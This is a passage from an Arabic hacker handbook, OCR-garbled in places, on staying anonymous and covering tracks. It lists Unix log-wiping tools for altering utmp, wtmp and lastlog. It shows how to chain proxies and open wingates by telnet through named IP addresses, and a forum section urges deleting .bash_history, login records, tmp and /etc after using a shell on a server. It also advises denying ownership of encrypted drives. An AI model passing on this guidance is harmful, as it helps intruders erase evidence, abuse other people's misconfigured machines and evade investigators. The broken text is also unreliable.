انصحك باستشارة محاميك و انكار انك لديك اي اقراص صلبه مشفره

الجزء السابع :========

قائمه بافضل البرامج للتخفي و الختباء :******************************

Change - Changes fields of the logfile to anything you wantDelete - Deletes, cuts out the entries you want

Edit - real Editor for the logfileOverwrite - just Overwrites the entries with zero-value bytes.

Don't use such software (f.e. zap) - it can be detected!---------------------------------------------------------------

LOG MODIFIER++++++++++

ah-1_0b.tar Changes the entries of accounting informationclear.c Deletes entries in utmp, wtmp, lastlog and wtmpxcloak2.c Changes the entries in utmp, wtmp and lastlog

invisible.c Overwrites utmp, wtmp and lastlog with predefines values, soit's better than zap. Watch out, there are numerous inv*.c!

marryv11.c Edit utmp, wtmp, lastlog and accounting data - best!wzap.c Deletes entries in wtmp

wtmped.c Deletes entries in wtmpzap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected!

--------------------------------------------------------------------------------------الجزء الثامن :

=========كلمه ختاميه**********

86

Page 87: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

لتدعهم ابدا يقبضون عليك .. دائما اجعل عيناك مفتوحان .. اعرف في من تثق و من ل !! لتفكر في نفسك فقط (انما ايضا تذكر كل من حولك )

تمنياتي للجميع بحياة ممتعه و امنه ..

انتهى،،،

" كيف تبقى مجهول الهوية في النت (الجزء الول)؟؟ "

<ةةةةة ةة ةةةةة ةةةةة>

<ةةةةةة: ةةةةةة>

في هذا الموضوع سوف أقوم بتعليمكمماهو؟

Proxy - Sock Host - Wingate-(وكيفية استخدامهم للزيادة من صعوبة الكشف عن هويتك في النت)-

مع أدوات بسيطة أيضا تساعدك في التخفي

87

Page 88: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

++++++++++++++++++++++++++++++++++

Introduction to Proxy Server أي:خادم الوكيل)=proxy server=(الدخول إلى

proxy server (خادم الوكيل) هو خادم serverليقوم أحدا ما بتنزيله على نظامه للتصال مع المواقع proxy serverأو أي جهاز على النترنت مايفعله أول هو التصال بخادم الوكيل

لكنه غير إجباري لكن غالبا مايستخدم في الشبكات LANمثل:

Local Area Network جميع اتصالتك سوف تذهب إلى هذاproxy serverشبكة إنترنت محلية عند اتصالك بالنترنت خلل

البروكسي المستخدم أول وقبل كل شيء ثم تتوزع على الجهزة التي تريد أن تعمل إتصال بها كمثال وتريد أن تتصفح وتفتح موقعا كهذاproxy serverإذا أردت أن تتصل بالنترنت من خلل استخدام

http://hackergurus.tk/ بطلب الصفحة proxy server ثم يقوم proxy serverعليك أول بالطلب من هذا

http://hackergurus.tk/ الموقع ومن ثم تحميلها وتخزينها في حسابها بعد ذلك سوف تمدك وتعطيك الصفحةserverإلى الخادم

أي:تستعرضها... بسيط في وقت أطول مقارنة بالتصال المباشر (العادي) الذي يكلفك فقط بطلبbitأليست هذه العملية تأخذ

الصفحة من خادم الموقع ومن ثم جاري تحميلها بسهولة واستعراضها لكن مع استعمالك للبروكسي سيرفر سوف يصبح اتصالك بالنترنت بطيء مقارنة مع التصال المباشر وذلك

وهذا يثقلproxey serverلن كل صفحة تقوم بتحميلها أي تستعرضها تذهب إلى خادم البروكسي أي عملية التصفح

بعض الحيان قل كيف luckyوهناك حالة وحدة وقد تصبح إذا الشخص قام باستخدام نفس البروكسي واستعرض نفس الصفحات وانت استخدمت البروكسي الي

استخدمه هذا الشخص واستعرضت الصفحة الي استعرضها راح يصبح البروكسي سريع ليه؟! فماproxy serverلن الشخص الول الي قام باستخدام البروكسي وعرض الصفحات الصفحة حملت إلى

بالك إذا كان لديك نفس البروكسي وحبيت تسعرض نفس الصفحة سوف يكون سريع لن الصفحةdownload#.. جاهزة فهمت

أيام وانت استخدمت نفس10وأيضا ياأخواني الوقت مهم مثل اذا الواحد استعرض صفحة ببروكسي من قبل يقدم المواقع الحديثةproxy serverالبروكسي واسعرضت نفس الصفحة غير اذا عرضها في يومين لن

Reload أو Refreshعلى القديمة علشان كذا أحيانا تلحظ تأخر في البروكسيات كل ماعليك عمل

Why use a Proxy Server=(لماذا نستمعل البروكسي سيرفر؟)=

وانا راح اجاوب على الخوان الي يسئلوني مادام خادم البروكسي يقوم بعملية إبطاء التحميل والتقليل منالسرعة إذا مالدافع لستخدامه ؟!!!

الجواب:هو أن مزودين خدمة النترنت ISP

Internet Service Provider يقومون بالتحديد وبوضعك في قفص وهو عدم السماح لستعراض وتحميل الصفحات إل التي تم الموافقة

الخاص بهم لتوفير السرعة فيTrafficعليها من قبل مزود الخدمة ويقومون بتقليل المواقع للحفاظ على استخدام البروكسي لمشتركينهم

سوف يجعل لك الحرية الكاملة في استعراض أي موقع مهما كان وسبب آخرproxy serverأما للبروكسي وهو للحفاظ أو للزيادة من بقائك مجهول أثناء قيامك بأي عملية من عمليات التصال يعني لو

الذي اتصل الموقع من خللهipاستخدمت بروكسي راح يصعب على خادم الموقع اصطيادك وذلك لنه يأخذ البروكسي وهو الذي يتصل مع خادم الموقعipوهو

وأيضا تستطيع الزيادة من صعوبة محاولة السقاط بك وذلك باستخدام عدة بروكسيات ذات منافذ مختلفة لكنأعلم أن هذا سوف يقوم بتقليل من سرعة التصال لذلك حاول ان تستخدم

proxy و port قريبين إلى منطقتك التي تعيش فيها حتى يكون proxy serverقريب وبذلك سوف

88

Page 89: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

تزداد السرعة وأحيانا تفوق سرعة البروكسي سرعة بروكسي الخاص بمزود الخدمة مارأيك!! ..) تحذير للجميع إياكم ياأخوان أن تنخدعوا ببروكسيات مايكروسوفت مهما وضع لها من إعلن كأن يقول

استخدمcach.microsoft.com 80 بمنفذ

وطبعا انت ماتصدق تلقي بروكسي بهذي المميزات - سريع التصفح 1- يفتح جميع المواقع2- التحميل عالي جدا وقوي 3

هل تعرف لماذا ؟لن أكثر المستخدمين حول العالم هذا البروكسي سيرفر وهذا خطير جدا

Logsلن هذا البروكسي سيرفر سوف يقوم بمعرفة جميع تحركاتك وحفظها في ملفات

Introduction to Wingate)=Wingate=(الدخول أو الدخال إلى

كثيرا مانسمع عنه لكن هل نعرف معناه الحقيقي ؟ ؟WinGateماهو

أي يفوق البروكسي وهو خادم بروكسي ذو حاجز ناري يحتوي علىproxy server firewallهو (مجهول الهوية)Anonymouslyحزمة كبيرة وضخمة من البرامج المختصة بالحماية والتي تبقيك

التي تقوم بالسماح بالمشاركة بفرد واحد أو بعدة من اتصالت النترنت بشركة كمبيوتر بالكامل تقريبا لعدة أنواع تشمل:WinGateاتصال النترنت يكون مشارك بواسطة

-------------------------------------------------------------------------------------------dial up modem, ISDN, xDSL, cable modem, satellite connection, or even

dedicated T1 circuits-------------------------------------------------------------------------------------------

wingate , في الحقيقة23متشابه مع البروكسي سيرفر حيث يعمل اتصالت مع كومبيوتر لسيرفر آخر خلل المنفذ

.Telnetهو اتصال the wingateسوف يجعل أي شخص على الشبكة دخول النترنت أو التصال به لمواقع أخرى . بصورة

(المدير)Aminstrator وعدم كفاءة wingateسيئة وفق بين والذي تجعل الشخاص على النترنت للتصال ببعضهم , بدل من تحديدwingateوهنالك العديد من (الشبكة المحلية)Local Networkالمدخل للناس من

إلى سوء استغلل الحجم .ICQ - Mirc في ipspoofوفتح الطريق لي شيئ من وعادة تنتهي مدتها في بضعة أيام أو شهور حتى يقومopen wingates قد يطلق عليه wingateمثل

ياأخواني يعني مكشوف أو يتلقى شكاوي منDIScover (المدير) وهذا راح يكون Adminباكتشافه سوء استخدام أو أعضاء غامضين !!!

الفائدة الوحيدة للمديرين هي القدرة على وضع مستخدمين متعددين في نفس التصال لكن ياأخوان المشاكلتفوق الفوائد

خاص به عليه الحذر بشدة ومعرفة ماهو يفعل ويتأكد من أنه موفقWinGateإذا أي شخص قام بتنزيل SyGate أمانا مثل برامج WinGateبشكل آمن وهنالك أخرى متعددة أكثر

ساعة48 تحذف عادة بعد WinGate Server (سجلت) الخاصة بالـLogsفي معظم الحالت ملفات (خاصة بالكبار)ISP'sللعمال وأيضا للـ

wingateأي ليوجد حاجة أو موارد لتدوين كل شيء يصادف خادم

How do I find Wingates؟)=WinGate=(كيف يمكنني الحصول على

من أصدقائك إذاwingateأفضل طريقة للحصول على هذا الشيء هو كلمة بالفم . بإمكانك تاخذ عنوان كان أحد عنده . الشيء الثاني أقترح عليك تستخدم برامج

WinGate Scanner googleهنالك العديد منها بالنت ابحث فقط في

http://www.google.com/

89

Page 90: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

ومن ثم البدء بالبحثhostname او ipكل ماعليك فعله هو وضع مدى @ كلهمhomeمثل اقترح عليك البحث في بلد العالم الثالث أو الشرق الوسط وأفريقيا وأخيرا شبكة

يتشابهون ولديهم صفات شائعة وهي: NetWork مفتوح قليل على wingate والذي وفق بصورة رديئة وعادة هناك wingatesتوفر

حقهم ... أفضل طريقة هي: المحاولة والخطأ Unixخلل

Trial and Error 23 من المنفذ wingateاتصل بالتلنت في

واذا لقيت اترك فراغ السم والباسوورد واذا دخلت راح تحصل واحد أيضا بإمكانك تجربة اسمك وكلمة سركAnonymously (الضيف) أو Guestاو تستخدم ميزة

Introduction to Socks Host)=Socks Host=(الدخول أو الدخال إلى

Socks Host تقريبا مثل WinGate 1080 لكن الختلف وهو ان السوكس يتصل من خلل المنفذ وبإمكانك عمل العدادات عليها وهي تتوفر في المتصفح

explorer and netscape Socks Hostوبإمكانك إضافة

FireWall الخاص بك وتعمل كـip وتقوم بحمايتك وبإخفاء Mircوهذه الطريقة تستخدم كثيرا في

**********************وهذه برامج مساعدة على بقائك مجهول الهوية

**********************Ghost Surf

$$$$$$$$$$$$$$$$$$$$$$Stealther

-------------------------------------------

ابحثوا عن البرنامجين السابقين في النترنت

--------------------------------------------%100لكن أعلم ياأخي الكريم أن وبكل مافعلت لن تصبح مجهول

انتهى،،،

" كيف تبقى مجهول الهوية في النت(الجزء الثاني)؟؟ "

<ةةةةة ةة ةةةةة ةةةةة>

<ةةةةةة: ةةةةةة>

ألحين الموضوع هذا سوف يكون فيه تطبيق عملي وليس كالسابق...

لبقاء حريتك وسريتك على النترنت وقت أطول أثناء اتصالك لكنChaining Proxiesهذه الفقرات عن لتظن ان هذا الموضوع كافي فكلما قرأت عن هذا الجانب سوف تصبح الشخص المجهول

90

Page 91: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Telnet لتصبح مجهول على Chaining wingatesوأيضا سوف نتكلم عن

)------------------------------------------- او قد يستخدم البروكسي لكيDomain الخاص به او ip لخفاء proxyمن المعروف أن أغلبكم يستخدم

يجتاز المواقع المغلقة وأيضا لحماية هويته . Domain و Ip Address ومن الفضل ان تعرف ماذا هو Proxyلكن عليك ان تتعلم كيف تستخدم

أول ,,, مع تحديثها من هذهProxyقبل أن تقرأ هذا الموضوع علي اول ان اقوم بإرشادك كيف تحصل على

المواقع:http://www.multiproxy.org/anon_list.htm

http://tools.rosinstrument.com/proxy/ وهو يقوم بإرسال بروكسيات جديدة جداGroupأو هنالك طريقة أفضل لكم وأنصحكم إنكم تسجلون بـ

وبمنافذ مختلفة [email protected]الجروب:

طريقة التسجيل قم بالدخول إلى حسابك وأرسل للجروب بهذه الطريقة

في خانة الرسال إلى اكتب[email protected]

Replayوأرسل رسالة فارغة إليهم بعد ذلك سوف تتلقى رد مباشرة قم بعمل الن مبروك لقد سجلت بالجروب

)-------------------------------------------

=========================أن لن أقوم بمساعدتك في كل عمل تقوم به تستطيع التأكد من أن

البروكسي يعمل بالذهاب إلى :http://www.privacy.net/

أوhttp://www.proxytester.com/

تغير أم ل !!! هذا بالنسبة للموقع الول أما الموقع الثاني فهو خاص لكشفIpوقد تعرف هل عنوان البروكسيات واعطائك مستوياتها ..

=========================

*************************************

&&&&&&&&&&&&&&proxy server

&&&&&&&&&&&&&&

)WebSite,IRC Chat,etc يقوم بالتصال بين :(Proxyهو خادم

هذه البروكسيات تقوم بإرسال طلبات لكي يستقل او يستعرض المستخدم موقعا على النترنت البروكسي يرسل طلبك على النترنت لكي يطلب هذا الموقع وبعد ذلك سوف تدخل الموقع ببروكسي وهذا سوف يخزن

Proxy Serverفي كما قلنا في الموضوع السابق...

هذي توضح كيف تتصل عن طريق البروكسي بالموقع ]User]>>>>>[Proxy]>>>>>[Web Pages [

----------------Proxy Chaining

91

Page 92: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

---------------- معناها عدة بروكسيات وهذي طريقة فعالة جدا لكي تصبح مجهول الهوية حيث يمكنك ان تتصل بأكثر من

بروكسي لكي تعرض موقع واحدمثال/

]User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination [ يوضح هذا المثال ان المستخدم اول عليه التصال بالبروكسي الول فالثاني فالثالث والرابع وأخيرا الهدف

مما يسبب بطأ في التصالDestination = web page, Unix server, ftp server, etc

مطلب ضروري لكي يستخدمه أي هكر ليحفظ سريته اثناء الدخول إلى أيProxy chainingإذا server مثل telnet, ftp, or http

Chaining لكن حاول بقدر المستطاع على ان ل تمسك100 هي مهمة كما أقول لن تصبح مجهول % ويطادونك مثل السمكة لكن البروكسيات المتعددة صعب ان يكشفها احدا لكن مثل حاولت تدخل على موقع بالـ

ftpراح يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلب من Adminstrator ملفات Logs لكي يعرف المصدر والمصدر ايضا راح يكون proxyههههههههه

عملية مفيدة جداChaining Proxyيعني على هذا المنوال إلى ان يصل الى المستخدم لذلك عملية ويصعب احدهم المساك بك

تنحذف في اوقات بعد الضغط على البروكسي لكي يصل الى الحد المسموح به من تحميلLogsلكن ملفات متجددة ...Logsالملفات على البروكسي الخادم الي يحتوي على البروكسيات لذلك سوف تصبح ملفات

----------------HTTP Chaining

----------------HTTP chaining هي نفس طريقة Proxy ويمكنك عملها من مستعرضك وفي خانة Address

مثال:http://proxy.magusnet.com/-_-http://www.google.com

حركة جميلة وجديدة (-_-) لم ترونها مسبقا صحيح !!! مثل:Chainingوأيضا يمكننا استخدام

http://proxy.server1.com/-_-http://proxy.server2.com/-_-http://www.destination.com

او يمكننا وضع عناوين بروكسيات بمنافذها

http://anon.free.anonymizer.com/http://www.google.com

مثال آخر

كإضافة علمة (/) بين المواقع

http://proxy1/http://proxy2:80/proxy3:80/http://www.yahoo.comproxy..... استبدله ببروكسي رقمي يكون أفضل لك =

----------------Browser Chaining

---------------- لنه الكثرInternet Explorerوهو استخدام البروكسي من متصفحك وانا سوف يكون حديثي فقط عن

استخداما ----ألحين مثل عندنا بروكسي 213.234.124.23:80

213.234.124.23العنوان:

92

Page 93: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

80المنفذ: أي مزد خدمة النترنت ISPألحين كيف نحطها بدال البروكسي الخاص بالـ

نروح عند Toolsأدوات

Internet Optionsخيارات إنترنت Connectionsبعدين اتصالت

تختار التصال الي تدخل في النترنت بعدين Settingsإعدادات راح تجد

Address(العنوان) Port(المنفذ)

ونضعه بداله وبعد كذا اضغط موافق و80 المنفذ:213.234.124.23العنوان:

Chaining Proixesوالحين نبغى نستخدم الستعراض المتعدد بدال مانحط بروكسي واحد في العنوان نحط أكثر من واحد مثل كذا/

Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port: 80

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

&&&&&&&&&&&&&&Wingates

&&&&&&&&&&&&&&Wingate هو proxy serverالذي ينزل في جهازه او جهازها ليسمح بالفرد او بعدة أفراد ليأخذون

العادي ))Telnet ((منفذ 23مقاعدهم بالمنفذ خلل لكي يتصلون به مباشرة او في وقت قصيرonline يسمحون لي شخص متصل Wingatesبعض

تمنع من استخدامAdminلتتعدى اليام لكن اعلم ان هذا ليس من القانون وهنالك خصائص للـwingate!!!! على جهازه هذا على حسب المدير هل يفهم في هذا المجال أم ل

أو يمكنك منTelnet بأداة 23 أجهزة أو اسماء أجهزة تتصل من خللها على المنفذ ipوهي عبارة عن عمل بحث ببرامج

WinScan

Wingate

93

Page 94: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

Download

-------------------------------Chaining Wingates Using Telnet

-------------------------------

كالسابق والدوات التي نحتاجها Wingateألحين راح نستخدم عدة

لظن أن الجهزة سوف تخلو من أهم هذين الداتين إل نادرا .....Telnet وأداة DoSهي فقط

لكن المنفذ ليس مهما لكني سوف أضيفها لكم لكي تتعلموا23 تتصل عن طريق المنفذ wingateجميع عن طريق المنافذ Telnetفقط كيف يتم التصال بالـ

وهذا عنوان جهاز امكننا إحضاره

23 ومنفذه 61.133.119.130هو

مثل:Telnetويتم التصال به عن طريق

C:\WINDOWS>telnet 61.133.119.130 23 لحظ وجود المسافات فمسافة زائدة او ناقصة قد تعثر خطوتك

بعد كذا سوف تتصل بالوين جيت مثل هذا

Wingate> 203.207.173.166 23

بعدين تقدر تكرر العملية اكثر من مرة ولكن مع تغيير العنوان يعني كذا

Wingate> 213.17.99.45 23

وأيضا اتصل مرة أخرى

Wingate> 10.65.212.7 23

94

Page 95: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

اتصل بالموقع wingateألحين بعد ماتتصل بأكثر من

WinGate>arbornet.org

اذا الطريقة وبخطوة سريعة تبدو كذلك

C:\Windows> telnet 61.133.119.130 23

Wingate>203.207.173.166 23

Wingate>135.245.18.167 23

Wingate>m-net.arbornet.org Connecting to host arbornet.org...Connected

انتهى،،،

95

Page 96: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

"Logs"بين حماية الخصوصية وإزالة الثارمن ملفات الـ

<منقول من منتديات الحزم السلمية><الكاتب: حزم الظامي>

فيما يتعلق بموضوع التخفي ومنع تعقب الثر مع سيرفرات يونكس أو لينوكس . أول لبد أن تعلم أن من أهم Unix Multi-User Modeخواص يونكس التي تمنحه القوة . تقوم على تعدد المستخدمين .

Operation ) ثم ل بد أن تعلم أن . Linux ) هو الصدار المجاني من نظام يونيكس( Unixيعني . ( Unixالفضل فهم يونيكس فحتما ستتعامل مع لينوكس بكل ارتياح كونك تتعامل مع

أول أريد أقسم الموضوع لقسمين رئيسين : ساتكلم عن كل واحد منهما بعجاله لن الموضوع ما تكفي ساعات معدودة لكتابة كل شيء عنه . بل وال

اتوقع ان عمر ابن ادم يفنى وهو يبحث عن المن على النترنت وكل ما تقدم مستواه كل ما اصبح يعي تماماكل ما حوله وما يجب ان يقوم به من اجل التخفي ومنع تعقب الثر ....

) LOG Fileالقسم الول : يخص ملفات النظام التي يسجل فيه اجراءاتك ... ( القسم الثاني : يتعلق باتصالك وحماية خصوصياتك ... وهذا يقف عن قدرات كل شخص فينا ....

و اكثرها حساسيةIPفي الواقع جميع الجهزة في انترنت تجمع المعلومات عنك ، ابسطها مثل عنوان ال مثل اسمك و رقم الهاتف الخاص بك ربما و عنوانك البريدي ........ ملفاتك و جهاز كومبيوترك محمي

بصورة جيدة للغاية لو ارتبط بانترنت بواسطة نظام التشغيل فقط و بدون استخدام برمجيات اضافية، ولكن حتى ولو حصل ذلك ففي غضون السابيع القليلة الولى سيفقد الجهاز الكثير من اجزاء حمايته نتيجة

Microsoftللستخدام الغير سليم لنترنت تتابع الشركات نظم التشغيل بشدة، الكل يتابع الثغرات في Windows و Linux و Macو غيرهما ، لذلك من الصعب الوصول الى تلك الجهزة بصورة فورية و

بدون تدخل رسمي ....

96

Page 97: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

والحقيقة انا لزلت في بداية طريقي لهذا المجال واسال ال ان يسهل ويفتح علينا من فضله ..

القسم الول : يخص ملفات النظام التي يسجل فيه اجراءاتك ... ) . مؤرخه بالوقت والجراء .LOG Fileما يتعلق بملفات التسجيل لجراءاتك تسمى (

وتسمى سجل الحداث كما تسمى ملفات سجل الداء

) معلومات واسعة عن حركة الوصول إلى موقعك، ضمنWeb serversتسجل جميع مزودات الويب ( )، وهي عبارة عن ملفات نصوص بسيطة تلتقط نشاطات الكمبيوتر المزود.log filesملفات سجل الداء (

ويمكن تحليل معلومات سجل الداء يدويا، وهذا ما كان يفعله الناس، في بدايات شبكة ويب. لكن إذا زاد حجم ) عن بضعة كيلو بايتات، فإن التحليل اليدوي يصبح غير عملي، إن لم يكنlog fileملف سجل الداء (

مستحيل كليا. وإذا أخذت بعين العتبار أن مزودات اليوم تولد ملفات لسجل الداء، يصل حجمها إلى ميجابايتات كثيرة، بل ويصل في كثير من الحيان إلى جيجابايت أو أكثر، لدركت ببساطة أن التحليل اليدوي

غير وارد إطلقا.ملفات سجل الداء

تبعا لمزود الويب الذي تستخدمه، تحتوي ملفات سجل الداء، على بعض-ومن المحتمل جميع-المعلوماتالتالية، لكل زيارة يقوم بها زائر إلى موقعك:

وأريد أخبرك ان ثمة ملفات ل يمكنك الووصول لها وهي تراقب كل اجراءاتك ... وتختلف الجراءات المنيةمن نظام لخر حسب قدرات مدير النظام الذي تعمل عليه ...

97

Page 98: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

اقتباس:

.WIN NTعموما أخوي هيكس تكلم عن هذه الملفات في نظام وكيف يتم إزالة اللوق فايل ويمكن الرجوع لدرسه ...

وانا الن راح اخبرك عن اهمها ول يشترط ان تزيل كل شي :( فما ل يدرك كله ل يترك جله ) ودائما حتى ل تحبط ( إذا لم تستطع شيئا فدعه وجاوزه إلى ما تستطيع )

عموما الطريقه المثلى للتعامل مع انظمة يونكس ... هي استخدام الشل النصي وهذا رأيي فأنا إلى الن اعيش في ذهول من قدرات هذا النظام العجوز ... يكفي ان الدوس صاحب المكانيات والسهولة .. وسرعة التنفيذ والستجابه هو في الصل جزء أو أداة من أدوات يونيكس وعملت مايكروسوفت على تطويرها وال فالصل

هو يونكس بل ادني شك ...عموما أهم الملفات حاليا أريدك تحذفها كل ما تستخدم الشل النصي . هي كالتالي :

.lastloginبدايته بنقطه مما يعني انه ملف مخفي فاي ملف أو مجلد يبدا بنقطه اذا هو مخفي مباشرة في يوينيكس .

وهذا الملف يسجل به اخر ايبي سجل الدخول .

.bash_historyهنا راح تسجل جميع الوامر التي نفذتها

.contactemailاذا ما كنت تستخدم الشل النصي للتعامل مع البريد

أيضا أريد منك حذف هذين المجلدين Tmp. والخر trash ويا حبذا تنسف معهم مجلد etc.

هنا مشكلة ربما يعرفها البعض .lastlogin & .bash_historyهو كوني حذفت ملفي .

bash_history تلقائيا راح يكون ناتج هذا الجراء تجدد ملف الباش .rmباستخدام المر ليصبح محتواه :

rm .bash_historyrm .bash_history

هو اليبي الذي دخلت به اخر مره .lastloginوراح يكون ناتج ملف .طيب وش الحل ننسفها نهائيا وما نريد أوامر الحذف تظهر ....

هو أفضل إجراء . وللعلم يا أخون هناك اعدادت جباره في اليونكس تمكنك منcpanelالطريقة تستخدم البداع ومن التجديد والبتكار ..

واذا مد ال في localhostعموما أخواني للعلم حتى يمكنك اللعب بالنظام كامل باليبي المحلي : العمر تكلمنا عن هذا الموضوع باذن ال ...

لحظ هذه الصورة : وهي من سي بانل مش فوتوشوب وبنفس الطريقة تتحكم في السيرفر بل اي معلوماتعن المصدر الحقيقي للتصال ....

98

Page 99: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

عموما سأعود لهذا الموضوع اذا مد ال بالعمر وال اني اعمل من اشهر على كتابة دروس نظرية وتطبيقعملي لحتراف يونيكس ...

وراح نكمل الحديث عن ملفات اللوق وحذفها حتى وإن لم يكن مسموح لك بملكيات ... فوال تستطيعالحذف ...

ننتقل للجزء الخر ...القسم الثاني : يتعلق باتصالك وحماية خصوصياتك ... وهذا يقف عن قدرات كل شخص فينا ....

أخوي الحقيقة المشكلة أن الغلب منا يستخدم إما نفس البروكسي لمستضيف الخدمه اللي يستخدمه .. وان ) ويجب أن ندرك أنكHTTP Protocolسهل ال .. اشتغل ببروكسي يعمل مع بروتوكولت التصفح (

حين تتعامل مع نظام يونيكس أو النظمة الخرى الشبيهه والحقيقة ان كونك تستخدم البروكسيات المعتاده للتصفح فهذا ل يخفي هويتك اذا استخدمت بروتوكولت

HTTP ولكن الحل المثل .... أنك تستخدم بروكسيات السوكس SOCKS Protocolفيجب عليك . إيجاد ارقام سوكس لستخدامها حماية لخصوصيتك أو عند الحاجة للتخفي اناء عملك على النظام .

عموما البروكسيات في مجملها ثلثة أنواع .1 (Web Proxy Service . وهذا للتصفح HTTP Protocol. 2 (WinSock Proxy Service وهذا مفيد مع سيرفرات windows NTويفيد في عملها على

WinSock وهذا هو البروتوكول FTP أو telnetاخفاء هويتك عند العمل على بروتوكولت Protocol......

3 (Socks Proxy Service) وهذا القوى ويستفاد منه في . SSL) Secure Sockets Layers) بالضافة إلى IIS) Internet Information Server ويخدم مع Windows NT

وهذا النوع يجمع بين كونهFTP ، Telnet، Gopher،IRC ، RealAudio ، POP3وكذلك firewall . إضافة إلى خدمة أمنية securiyوتكمن وظيفته في تغيير معلومات موارد خدمة النترنت ...

ويستخدم هذا البروتوكول وسيلتين للتصالTCP/IPالتي تتصل بها ..... وعادة ما يستخدم فيها بروتوكول :

)Internationa Organization for Standardization* طريقة المنظمة العالمية ( ransmission Control** مجموعة بروتوكولت للتصالت . وضعتها وزارة الدفاع المريكية .

Protocol TC... الحقيقة أخواني هناك أمر هام جدا وهو أن ثمة برامج تساعدك كثيرا بتقنياتها المحترفة تساعدك في التخفي

من تقنيات الرقابة التي ل يخلوا منها نظام ... وهي كثر جدا :Ping، Traceroute, DNS lookup, Finger, Whois, LDAP, SNMPوهذا يكون باعتبار

TCP/IP ... ويستفيد من وتوكول WIN NTالنظام واعتبار بروتوكول التصال الذي يستخدمه نظام : لمراقبة النظام ...

وهو أداة فعاله لتشخيص النظام ونعنيRouter عن طريق الرواتر . UNIXوبالمقابل يتم مراقبة نظام بهذا المصطلح أي الموجه أو الموزع ويتميز الراوتر بقدرته على التعرف على كل جزء من أجزاء الشبكة

ويعمل عى مراقبة الداء وموازنة سير البيانات ويسمح للشبكات المتصلة بالحفاظ على استقلليتها...ومواصفاتها وعناوينها الخاصة .

) . الول : إستاتيكي يتطلب من مدير الشبكة ضبط يدوي .Routerوهنا نوعين للموجهات أو الموزعات (ويتميز هذا النوع بالمان .

99

Page 100: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

والثاني ديناميكي .... يقوم بأعماله اتوماتيكيا ...ويحتاج الى ضبط بسيط وهو أقل أمانا من الول .

عموما انا اسف ربما تفرعت في هذا الموضوع . عموما إخواني بالنسبة للتصال ... أنا أقول لكم عليكمبتشفير أو إخفاء أو تزوير بياناتكم باي طريقة ... ببرامج أو بدون . وعليكم بمراقبة هذه البورتات :

Port 21 = FTPPort 23 = TelnetPort 25 = SMTP

Port 53 = DNSPort 79 = FingerPort 80 = HTTP

Port 110 = POP3Port 111 = SunRPCPort 139 = NetBIOS

Port 443 = SSLPort 1080 = SOCKS

Port 8181 = IMail

والحقيقة الفضل من هذا كله أن تسجل دخولك باليبي المحلي أو لبد أن تستخدم بروكسيات من نوع سوكس.

ومعروف لديكم أكيد .HTTPortوهناك برامج جيدة كالتالي : أفضلها في نظري أداءا وسهولة ... برنامج صورة للبرنامج اناء عمله .

HTTPort الخاص بشبكة النترنت، فقد صمم برنامج TCP/IPتقنية حديثة مرتبطة ببروتوكول التصال (التابعProxy Serverمن أجل إخفاء الهوية الحقيقية عن الخرين وأيضا يتخطى المرشح)البروكسي

وأشبه ما يوصف بأنه برنامج يشغل برامج النترنت من تحت نفق وهمي يتجاوزISPلمزود الخدمة وليرتبط مع بروكسي آخر.Proxyالحواجز المنية (المرشح (

بطريقة عمله يحقق حرية التصفح في شبكة النترنت وإخفاء هويةHTTPortوكما ذكرنا فان برنامج المستخدم .

ويقوم بدوره خير قيام فهو يخفي هويتك ول يمكن حتى لمسؤولSOCKSبل وستخدم ايضا بروتوكول الشبكة المحلية معرفة نشاطك ناهيك عن هويتك ...

وهنا ايضاحات لبعض الخدمات التي يؤديها البرنامج ؟

100

Page 101: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

101

Page 102: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

102

Page 103: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

103

Page 104: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

104

Page 105: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

هذا بالضافة إلى أن المتصفح اكسبلورر يسمح لك باضافة بيانات مزود الخدمة ... سواءا كان الفعلي أو )Anonymousوهمي للتخفي (

كيلو بايت إل أنه يخدم أكبر من حجمه بكثير جدا ... واسمه :18وهناك برنامج صغير ل يتعدى حجمه AnalogX Proxy

,HTTP (web), HTTPS (secure web), POP3 (recieve mail)فهو يدعم كل هذا : SMTP (send mail), NNTP (newsgroups), FTP (file transfer), and

Socks4/4a and partial Socks5 (no UDP) protocols! It works great with Internet Explorer, Netscape, AOL, AOL Instant Messenger, Microsoft

Messenger, and many more!

http://www.analogx.com/files/proxyi.e xe

PortBlockerويدعمه برنامج آخر اسمه : يساهم في حماية البورتات التي تستخدمه في تصفحك أو نقلك للملفات أو غيرهما من ان تستخدم في مراقبة

تحركاتك وتسجيل معلوماتك :PortBlocker is configured to block the most common types of servers

that might be on a system (FTP, HTTP, etc), so will not require any modification for most users. If you are running a special server of some

sort, then you can easily add it's ports (either TCP or UDP) to it's list, and have them blocked and/or logged.

Log unauthorized port access attempts and secure internal servers from internet access easily...

105

Page 106: 30872174-Full-Book-in-Hacker-s-كتاب-كامل-عن-الهكرز

PortBlockerحمل من هنا برنامج http://www.an alogx.com/files/pblocki.exe

